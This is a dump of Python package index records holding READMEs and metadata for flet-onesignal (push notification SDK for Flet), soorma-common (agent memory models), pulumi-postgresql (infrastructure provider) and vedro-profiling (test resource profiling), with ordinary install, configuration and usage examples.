# Track an outcome with a value (e.g., purchase amount)
await onesignal.session.add_outcome_with_value("purchase", 29.99)
```
---
## Live Activities (iOS)
Update iOS Live Activities in real-time (iOS 16.1+):
```python
# Enter a Live Activity
await onesignal.live_activities.enter(
activity_id="delivery_12345",
token="live_activity_push_token"
)
# Exit a Live Activity
await onesignal.live_activities.exit("delivery_12345")
# Set push-to-start token for a Live Activity type
await onesignal.live_activities.set_push_to_start_token(
activity_type="DeliveryActivityAttributes",
token="push_to_start_token"
)
# Remove push-to-start token
await onesignal.live_activities.remove_push_to_start_token("DeliveryActivityAttributes")
# Setup default Live Activity options
await onesignal.live_activities.setup_default()
```
---
## Privacy & Consent
For GDPR and other privacy regulations, you can require user consent before collecting data:
```python
# Create OneSignal with consent requirement
onesignal = fos.OneSignal(
app_id=ONESIGNAL_APP_ID,
require_consent=True, # SDK won't collect data until consent is given
)
# After user accepts your privacy policy
await onesignal.consent_given(True)
# If user declines
await onesignal.consent_given(False)
```
> **Important:** `require_consent=True` must be set in the constructor for the consent methods to work.
> Without it, the SDK is fully active from initialization and calling `consent_given()` has no practical effect.
---
## Debugging
### Log Levels
Configure SDK logging for development:
```python
# Set log level during initialization
onesignal = fos.OneSignal(
app_id=ONESIGNAL_APP_ID,
log_level=fos.OSLogLevel.VERBOSE,
)
# Or change it dynamically
await onesignal.debug.set_log_level(fos.OSLogLevel.DEBUG)
# Set alert level (visual alerts for errors)
await onesignal.debug.set_alert_level(fos.OSLogLevel.ERROR)
```
**Available log levels:**
| Level | Description |
|-------|-------------|
| `NONE` | No logging |
| `FATAL` | Only fatal errors |
| `ERROR` | Errors and fatal errors |
| `WARN` | Warnings and above |
| `INFO` | Informational messages and above |
| `DEBUG` | Debug messages and above |
| `VERBOSE` | All messages including verbose details |
### Error Handling
```python
def on_error(e: fos.OSErrorEvent):
"""Called when an error occurs in the SDK."""
print(f"Error in {e.method}: {e.message}")
if e.stack_trace:
print(f"Stack trace: {e.stack_trace}")
onesignal = fos.OneSignal(
app_id=ONESIGNAL_APP_ID,
on_error=on_error,
)
```
### Debug Console
A built-in visual console for viewing application logs during development:
```python
import flet as ft
import flet_onesignal as fos
# Setup file-based logging (writes to FLET_APP_CONSOLE or debug.log)
logger = fos.setup_logging()
async def main(page: ft.Page):
debug_console = fos.DebugConsole()
page.appbar = ft.AppBar(
title=ft.Text("My App"),
actions=[debug_console.icon], # Bug icon opens the console
)
# Or use a floating action button instead
# page.floating_action_button = debug_console.fab
logger.info("App started")
page.add(ft.Text("Hello World"))
ft.run(main)
```
The `DebugConsole` reads log entries written by `setup_logging()` and displays them in a filterable dialog with color-coded levels (`fos.LogLevel.DEBUG`, `INFO`, `WARNING`, `ERROR`, `CRITICAL`).
### Android Logcat Scripts
The [`scripts/`](scripts/) directory includes two logcat viewer scripts that display Android logs with **Android Studio-style colors and formatting**. They auto-detect the focused app, filter by its PID, and highlight Flet/Flutter, Python errors and exceptions.
**Bash version** (Linux/macOS — requires `adb` in PATH):
```bash
# Default filter (flutter, python, Error, Exception, Traceback)
./scripts/flet_log.sh
# Add extra filters
./scripts/flet_log.sh "OneSignal|Firebase"
```
**Python version** (cross-platform):
```bash
python scripts/flet_log.py
python scripts/flet_log.py "OneSignal|Firebase"
```
> **Requirement:** A device or emulator connected via `adb`. The scripts clear the logcat buffer on each app restart so you only see fresh output.
---
## API Reference
### OneSignal (Main Class)
```python
fos.OneSignal(
app_id: str, # Required: Your OneSignal App ID
log_level: OSLogLevel = None, # Optional: SDK log level
visual_alert_level: OSLogLevel = None, # Optional: Visual alert level (iOS)
require_consent: bool = False, # Optional: Require user consent
on_notification_click: Callable = None,
on_notification_foreground: Callable = None,
on_permission_change: Callable = None,
on_user_change: Callable = None,
on_push_subscription_change: Callable = None,
on_iam_click: Callable = None,
on_iam_will_display: Callable = None,
on_iam_did_display: Callable = None,
on_iam_will_dismiss: Callable = None,
on_iam_did_dismiss: Callable = None,
on_error: Callable = None,
)
```
### Event Types
| Event Class | Properties |
|-------------|------------|
| `OSNotificationClickEvent` | `notification`, `action_id` |
| `OSNotificationWillDisplayEvent` | `notification`, `notification_id` |
| `OSPermissionChangeEvent` | `permission` |
| `OSUserChangedEvent` | `state.onesignal_id`, `state.external_id` |
| `OSPushSubscriptionChangedEvent` | `id`, `token`, `opted_in` |
| `OSInAppMessageClickEvent` | `message`, `result.action_id`, `result.url`, `result.url_target`, `result.closing_message` |
| `OSInAppMessageWillDisplayEvent` | `message` |
| `OSInAppMessageDidDisplayEvent` | `message` |
| `OSInAppMessageWillDismissEvent` | `message` |
| `OSInAppMessageDidDismissEvent` | `message` |
| `OSErrorEvent` | `method`, `message`, `stack_trace` |
### Enums
```python
class OSLogLevel(Enum):
NONE = "none"
FATAL = "fatal"
ERROR = "error"
WARN = "warn"
INFO = "info"
DEBUG = "debug"
VERBOSE = "verbose"
```
---
## Migration from v0.3.x
If upgrading from version 0.3.x, note these breaking changes:
| v0.3.x (Old) | v0.4.0 (New) |
|--------------|--------------|
| `fos.OneSignalSettings(app_id=...)` | `fos.OneSignal(app_id=...)` |
| `onesignal.get_onesignal_id()` | `await onesignal.user.get_onesignal_id()` |
| `onesignal.get_external_user_id()` | `await onesignal.user.get_external_id()` |
| `onesignal.login(id)` | `await onesignal.login(id)` |
| `onesignal.logout()` | `await onesignal.logout()` |
| `onesignal.set_language(code)` | `await onesignal.user.set_language(code)` |
| `onesignal.add_alias(alias, id)` | `await onesignal.user.add_alias(label, id)` |
| `onesignal.request_permission()` | `await onesignal.notifications.request_permission()` |
| `onesignal.clear_all_notifications()` | `await onesignal.notifications.clear_all()` |
| `on_notification_opened` | `on_notification_click` |
| `on_notification_received` | `on_notification_foreground` |
| `on_click_in_app_messages` | `on_iam_click` |
| `ft.app(target=main)` | `ft.run(main)` |
**Key changes:**
- All methods are now **async-only** (no `_async` suffix)
- Methods are organized into **sub-modules** (`.user`, `.notifications`, etc.)
- Uses `ft.Service` base class instead of `Control`
- New event types with structured data
---
## Troubleshooting
### Notifications not appearing
1. Verify your OneSignal App ID is correct
2. Check that you've requested and received notification permission
3. Ensure platform certificates (APNs/FCM) are configured in OneSignal dashboard
4. Check device logs for any SDK errors
### App crashes on startup
1. Verify minimum SDK versions are met
2. Check that the OneSignal is added to `page.services`
3. Review the `on_error` handler for any initialization errors
### Tags not syncing
1. Tags are synced asynchronously - allow a few seconds
2. Check your network connection
3. Verify tags in the OneSignal dashboard under Users
---
## Example App
A complete example demonstrating all features is available in the [`examples/flet_onesignal_example`](examples/flet_onesignal_example) directory.
It includes pages for each module — login, notifications, tags, aliases, in-app messages, location, session outcomes and more — built with Flet's declarative UI.
To run:
cd examples/flet_onesignal_example
uv sync
uv run python src/main.py
---
## 🌐 Community
Join the community to contribute or get help:
- [Discord](https://discord.gg/dzWXP8SHG8)
- [GitHub Issues](https://github.com/brunobrown/flet-asp/issues)
## ⭐ Support
If you like this project, please give it a [GitHub star](https://github.com/brunobrown/flet-asp) ⭐
---
## 🤝 Contributing
Contributions and feedback are welcome!
1. Fork the repository
2. Create a feature branch
3. Submit a pull request with detailed explanation
For feedback, [open an issue](https://github.com/brunobrown/flet-asp/issues) with your suggestions.
---
## Try **flet-onesignal** today and enhance your Flet apps with push notifications!
---
<p align="center"><img src="https://github.com/user-attachments/assets/431aa05f-5fbc-4daa-9689-b9723583e25a" width="50%"></p>
<p align="center"><a href="https://www.bible.com/bible/116/PRO.16.NLT"> Commit your work to the LORD, and your plans will succeed. Proverbs 16:3</a></p>
| text/markdown | null | brunobrown <brunobrown.86@gmail.com> | null | null | null | null | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries",
"Natural Language :: English",
"Natural Language :: Portuguese (Brazilian)"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"flet>=0.80.0",
"tomli>=1.0.0; python_version < \"3.11\"",
"rich>=13.0.0; extra == \"cli\"",
"watchdog>=3.0.0; extra == \"cli\""
] | [] | [] | [] | [
"Homepage, https://github.com/brunobrown/flet-onesignal",
"Documentation, https://brunobrown.github.io/flet-onesignal",
"Repository, https://github.com/brunobrown/flet-onesignal",
"Issues, https://github.com/brunobrown/flet-onesignal/issues",
"Changelog, https://github.com/brunobrown/flet-onesignal/blob/main/CHANGELOG.md"
] | uv/0.10.3 {"installer":{"name":"uv","version":"0.10.3","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Linux Mint","version":"22.3","id":"zena","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T06:39:47.659675 | flet_onesignal-0.4.3.tar.gz | 50,669 | 07/c9/6e91c04fe21451130743df58f04098f5dc33eaa948f4b78e39e3d2b61c50/flet_onesignal-0.4.3.tar.gz | source | sdist | null | false | 651ba682a6e9516e254ca9d92310e4e0 | 64b72501516207f2113753e00720af93b1f7950ad129029237e764a4516966e8 | 07c96e91c04fe21451130743df58f04098f5dc33eaa948f4b78e39e3d2b61c50 | MIT | [
"LICENSE"
] | 259 |
2.4 | soorma-common | 0.7.7 | Common models and DTOs for Soorma platform services | # Soorma Common
Common models and DTOs shared across Soorma platform services.
## Installation
```bash
pip install -e .
```
## Usage
```python
from soorma_common.models import (
AgentDefinition,
AgentCapability,
EventDefinition,
SemanticMemoryCreate,
EpisodicMemoryCreate,
WorkingMemorySet,
)
# Create an agent definition
agent = AgentDefinition(
agent_id="my-agent",
name="My Agent",
description="A sample agent",
capabilities=[
AgentCapability(
task_name="process_data",
description="Process incoming data",
consumed_event="data.received",
produced_events=["data.processed", "data.error"]
)
]
)
# Create semantic memory (knowledge storage)
semantic = SemanticMemoryCreate(
agent_id="researcher",
content="Python is a high-level programming language",
metadata={"category": "programming", "source": "textbook"}
)
# Create episodic memory (interaction history)
episodic = EpisodicMemoryCreate(
agent_id="assistant",
role="user",
content="What is the weather like today?",
metadata={"session_id": "abc-123"}
)
# Create working memory (plan state)
working = WorkingMemorySet(
value={"current_step": 2, "total_steps": 5, "status": "in_progress"}
)
```
## Models
### Agent Registry
- `AgentCapability` - Describes a single capability or task an agent can perform
- `AgentDefinition` - Defines a single agent in the system
- `AgentRegistrationRequest` - Request to register a new agent
- `AgentRegistrationResponse` - Response after registering an agent
- `AgentQueryRequest` - Request to query agents
- `AgentQueryResponse` - Response containing agent definitions
### Event Registry
- `EventDefinition` - Defines a single event in the system
- `EventRegistrationRequest` - Request to register a new event
- `EventRegistrationResponse` - Response after registering an event
- `EventQueryRequest` - Request to query events
- `EventQueryResponse` - Response containing event definitions
### Memory Service (CoALA Framework)
The Memory Service implements the CoALA (Cognitive Architectures for Language Agents) framework with four memory types:
> **Authentication Note**: Memory Service supports dual authentication:
> - **JWT Token** (User sessions): Provides `tenant_id` + `user_id` from token
> - **API Key** (Agent operations): Provides `tenant_id` + `agent_id`, requires explicit `user_id` in request parameters
>
> See [Memory Service SDK documentation](../../sdk/python/docs/MEMORY_SERVICE.md) for details.
#### Semantic Memory (Knowledge Base)
- `SemanticMemoryCreate` - Add knowledge to semantic memory
- `SemanticMemoryResponse` - Semantic memory entry with similarity score
- **Use cases**: Store facts, documentation, learned information
- **Features**: Vector search, RAG (Retrieval-Augmented Generation)
- **Scoping**: Tenant-level (shared across users in tenant)
#### Episodic Memory (Interaction History)
- `EpisodicMemoryCreate` - Log an interaction or event
- `EpisodicMemoryResponse` - Episodic memory entry with timestamp
- **Use cases**: Conversation history, user interactions, audit logs
- **Features**: Temporal recall, role-based filtering (user/assistant/system/tool)
- **Scoping**: Tenant + User + Agent (user-specific conversation history)
#### Procedural Memory (Skills & Procedures)
- `ProceduralMemoryResponse` - Skill or procedure with trigger conditions
- **Use cases**: Dynamic prompts, few-shot examples, user-specific agent customization
- **Features**: Context-aware retrieval, trigger-based activation, personalization
- **Scoping**: Tenant + User + Agent (enables per-user agent customization)
#### Working Memory (Plan State)
- `WorkingMemorySet` - Store plan-scoped state
- `WorkingMemoryResponse` - Working memory entry
- **Use cases**: Multi-agent collaboration, plan execution state, shared variables
- **Features**: Plan-scoped isolation, key-value storage
- **Scoping**: Tenant + Plan (shared state within plan execution)
## Memory Service Examples
### Semantic Memory (Knowledge Storage)
```python
from soorma_common.models import SemanticMemoryCreate
# Store knowledge
memory = SemanticMemoryCreate(
agent_id="researcher",
content="FastAPI is a modern web framework for Python",
metadata={"category": "web-dev", "language": "python"}
)
```
### Episodic Memory (Interaction History)
```python
from soorma_common.models import EpisodicMemoryCreate
# Log user interaction
memory = EpisodicMemoryCreate(
agent_id="chatbot",
role="user", # user, assistant, system, tool
content="How do I deploy to production?",
metadata={"session_id": "session-123", "timestamp": "2025-12-23T10:00:00Z"}
)
```
### Working Memory (Plan State)
```python
from soorma_common.models import WorkingMemorySet
# Store plan execution state
state = WorkingMemorySet(
value={
"plan_id": "research-plan-1",
"current_phase": "data_collection",
"completed_tasks": ["search", "filter"],
"pending_tasks": ["analyze", "report"],
"research_summary": "Found 50 relevant papers..."
}
)
```
## Development
```bash
# Install in editable mode
pip install -e .
# Run tests
pytest
# Build package
python -m build
```
## Version History
See [CHANGELOG.md](CHANGELOG.md) for version history and release notes.
| text/markdown | null | null | null | null | MIT | null | [] | [] | null | null | >=3.11 | [] | [] | [] | [
"pydantic>=2.0.0",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"pytest>=7.0.0; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:39:32.156381 | soorma_common-0.7.7.tar.gz | 10,837 | 90/ba/489f18d708b5576f6925e85976ca46d5e997774067583820a7d0aa21607f/soorma_common-0.7.7.tar.gz | source | sdist | null | false | 49fe3b660ea9ba9555895dd2d77234a3 | 4ac2ac364d504ede1b813dd3a1d0f8862f59067563b850d726cec16f3db7bdbb | 90ba489f18d708b5576f6925e85976ca46d5e997774067583820a7d0aa21607f | null | [] | 222 |
2.4 | pulumi-postgresql | 3.17.0a1771569079 | A Pulumi package for creating and managing postgresql cloud resources. | [](https://github.com/pulumi/pulumi-postgresql/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/postgresql)
[](https://pypi.org/project/pulumi-postgresql)
[](https://badge.fury.io/nu/pulumi.postgresql)
[](https://pkg.go.dev/github.com/pulumi/pulumi-postgresql/sdk/v3/go)
[](https://github.com/pulumi/pulumi-postgresql/blob/master/LICENSE)
# postgresql Resource Provider
The postgresql resource provider for Pulumi lets you manage postgresql resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/postgresql
or `yarn`:
$ yarn add @pulumi/postgresql
### Python
To use from Python, install using `pip`:
$ pip install pulumi_postgresql
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-postgresql/sdk/v3
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Postgresql
## Configuration
The following configuration points are available:
- `postgresql:host` - (required) The address for the postgresql server connection. Can also be specified with the `PGHOST`
environment variable.
- `postgresql:port` - (optional) The port for the postgresql server connection. The default is `5432`. Can also be specified
with the `PGPORT` environment variable.
- `postgresql:database` - (optional) Database to connect to. The default is `postgres`. Can also be specified
with the `PGDATABASE` environment variable.
- `postgresql:username` - (required) Username for the server connection. The default is `postgres`. Can also be specified
with the `PGUSER` environment variable.
- `postgresql:password` - (optional) Password for the server connection. Can also be specified with the `PGPASSWORD` environment variable.
- `postgresql:database_username` - (optional) Username of the user in the database if different than connection username (See user name maps).
- `postgresql:superuser` - (optional) Should be set to false if the user to connect is not a PostgreSQL superuser (as is the case in RDS).
In this case, some features might be disabled (e.g.: Refreshing state password from database).
- `postgresql:sslmode` - (optional) Set the priority for an SSL connection to the server. Valid values for sslmode are (note: prefer is not supported by Go's lib/pq):
* `disable` - No ssl
* `require` - always SSL (the default, also skip verification)
* `verify-ca` - always SSL (verify that the certificate presented by the server was signed by a trusted CA)
* `verify-full` - Always SSL (verify that the certification presented by the server was signed by a trusted CA and the server
host name matches the one in the certificate) Additional information on the options and their implications can be seen in the libpq(3) SSL guide.
Can also be specified with the `PGSSLMODE` environment variable.
- `postgresql:connect_timeout` - (optional) Maximum wait for connection, in seconds. The default is `180s`. Zero or not specified means wait indefinitely.
Can also be specified with the `PGCONNECT_TIMEOUT` environment variable.
- `postgresql:max_connections` - (optional) Set the maximum number of open connections to the database. The default is `4`. Zero means unlimited open connections.
- `postgresql:expected_version` - (optional) Specify a hint to Terraform regarding the expected version that the provider will be talking with. This is a
required hint in order for the provider to talk with an ancient version of PostgreSQL. This parameter is expected to be a PostgreSQL Version or current.
Once a connection has been established, the provider will fingerprint the actual version. Default: 9.0.0.
- `postgresql:clientcert` - (optional) Clientcert block for configuring SSL certificate.
- `postgresql:clientcert.cert` - (required) The SSL client certificate file path. The file must contain PEM encoded data.
- `postgresql:clientcert.key` - (required) The SSL client certificate private key file path. The file must contain PEM encoded data.
## Reference
For further information, please visit [the postgresql provider docs](https://www.pulumi.com/docs/intro/cloud-providers/postgresql) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/postgresql).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, postgresql | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-postgresql"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:39:22.192117 | pulumi_postgresql-3.17.0a1771569079.tar.gz | 51,050 | 0d/23/252125e6d2fd840c2123d2021ad4d1c1c2d689e073b1dcb1774bd94a31b0/pulumi_postgresql-3.17.0a1771569079.tar.gz | source | sdist | null | false | f741a6b04ebbfa1a87f0e43dd940bd75 | baaaf58b69b41661de2e4cd3deacbfa984cbd9590b1d52fa361f820532e3cf67 | 0d23252125e6d2fd840c2123d2021ad4d1c1c2d689e073b1dcb1774bd94a31b0 | null | [] | 213 |
2.4 | vedro-profiling | 0.2.0 | Plugin for Vedro framework for measuring resource usage of tests | # Vedro profiling
[](https://pypi.python.org/pypi/vedro-profiling/)
[](https://pypi.python.org/pypi/vedro-profiling/)
[](https://pypi.python.org/pypi/vedro-profiling/)
> **Vedro profiling** - plugin for [Vedro](https://vedro.io/) framework for measuring resource usage of tests
The plugin measures CPU and memory usage during test execution and exports metrics in k6-compatible NDJSON format, making it easy to integrate with performance monitoring tools like Grafana, InfluxDB, and other observability platforms.
## Installation
<details open>
<summary>Quick</summary>
<p>
For a quick installation, you can use a plugin manager as follows:
```shell
$ vedro plugin install vedro-profiling
```
</p>
</details>
<details>
<summary>Manual</summary>
<p>
To install manually, follow these steps:
1. Install the package using pip:
```shell
$ pip3 install vedro-profiling
```
2. Next, activate the plugin in your `vedro.cfg.py` configuration file:
```python
# ./vedro.cfg.py
import vedro
import vedro_profiling
class Config(vedro.Config):
class Plugins(vedro.Config.Plugins):
class VedroProfiling(vedro_profiling.VedroProfiling):
enabled = True
```
</p>
</details>
## Usage
### Basic Usage
Enable profiling for your test run:
```shell
$ vedro run --enable-profiling
```
This will create a `.profiling/profiling.ndjson` file with CPU and memory metrics in k6-compatible format.
### With Custom Run ID
```shell
$ vedro run --enable-profiling --run-id load-test-2026-01-26
```
### With Visualization
Generate matplotlib plots alongside the metrics:
```shell
$ vedro run --enable-profiling --draw-plots
```
## Configuration
### Advanced Configuration
```python
# ./vedro.cfg.py
import vedro
import vedro_profiling
class Config(vedro.Config):
class Plugins(vedro.Config.Plugins):
class VedroProfiling(vedro_profiling.VedroProfiling):
enabled = True
enable_profiling = True
# Profiling methods: "default" (psutil), "docker" (containers)
profiling_methods = ["default", "docker"]
# Polling interval in seconds
poll_time = 1.0
# Generate plots
draw_plots = True
# Docker Compose project name for container monitoring
docker_compose_project_name = "my-project"
# Custom run identifier
profiling_run_id = "staging-load-test"
# Additional tags for metrics
additional_tags = {
"env": "staging",
"team": "performance",
"region": "us-east-1"
}
```
## Output Format
The plugin generates metrics in **NDJSON (newline-delimited JSON)** format compatible with k6 and other performance monitoring tools.
### File Location
- Metrics: `.profiling/profiling.ndjson`
- Plots (if enabled): `.profiling/*.png`
### NDJSON Structure
The output file contains metric definitions followed by data points:
```json
{"type":"Metric","metric":"cpu_percent","data":{"type":"gauge","unit":"percent"}}
{"type":"Metric","metric":"memory_usage","data":{"type":"gauge","unit":"megabytes"}}
{"type":"Point","metric":"cpu_percent","data":{"time":"2026-01-26T10:00:00.123Z","value":25.5,"tags":{"target":"app-1","method":"docker","run":"my-test-123"}}}
{"type":"Point","metric":"memory_usage","data":{"time":"2026-01-26T10:00:00.123Z","value":512.3,"tags":{"target":"app-1","method":"docker","run":"my-test-123"}}}
```
### Metrics
- `cpu_percent` - CPU usage percentage (gauge)
- `memory_usage` - Memory usage in megabytes (gauge)
### Tags
Each data point includes the following tags:
- `target` - Container name or process name
- `method` - Profiling method (`docker` or `default`)
- `run` - Unique run identifier
- Custom tags from configuration
## Processing Data
### Extract Data Points Only
```bash
cat .profiling/profiling.ndjson | jq -c 'select(.type=="Point")'
```
### Filter by Tags
```bash
cat .profiling/profiling.ndjson | jq -c 'select(.type=="Point" and .data.tags.env=="staging")'
```
### Convert to InfluxDB Line Protocol
```bash
cat .profiling/profiling.ndjson | jq -r '
select(.type=="Point") |
"\(.metric),target=\(.data.tags.target),method=\(.data.tags.method) value=\(.data.value) \(.data.time | fromdate * 1000000000)"
'
```
### Aggregate Metrics
```bash
# Average CPU by target
cat .profiling/profiling.ndjson | jq -s '
[.[] | select(.type=="Point" and .metric=="cpu_percent")] |
group_by(.data.tags.target) |
map({target: .[0].data.tags.target, avg_cpu: ([.[].data.value] | add / length)})
'
```
## Features
- **Multiple Profiling Methods**: Monitor both system-level metrics (via psutil) and Docker container metrics
- **k6-Compatible Format**: Export metrics in NDJSON format for easy integration with monitoring tools
- **Custom Tags**: Add custom tags for filtering and grouping metrics
- **Visualization**: Generate matplotlib plots for quick visual analysis
- **Non-Blocking**: Uses background threads to minimize impact on test execution
- **Flexible Configuration**: Configure via code or command-line arguments
## Integration Examples
### Grafana + InfluxDB
1. Convert NDJSON to InfluxDB Line Protocol
2. Import into InfluxDB:
```bash
influx write --bucket performance --file profiling.influx
```
3. Create Grafana dashboard using InfluxDB as data source
### Custom Analysis
```python
import json
# Read and process metrics
with open('.profiling/profiling.ndjson') as f:
for line in f:
point = json.loads(line)
if point['type'] == 'Point':
metric = point['metric']
value = point['data']['value']
tags = point['data']['tags']
# Process metrics...
```
| text/markdown | null | Nikita Mikheev <thelol1mpo@gmail.com> | null | null | Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | null | [
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Typing :: Typed"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"docker<8.0.0,>=7.0.0",
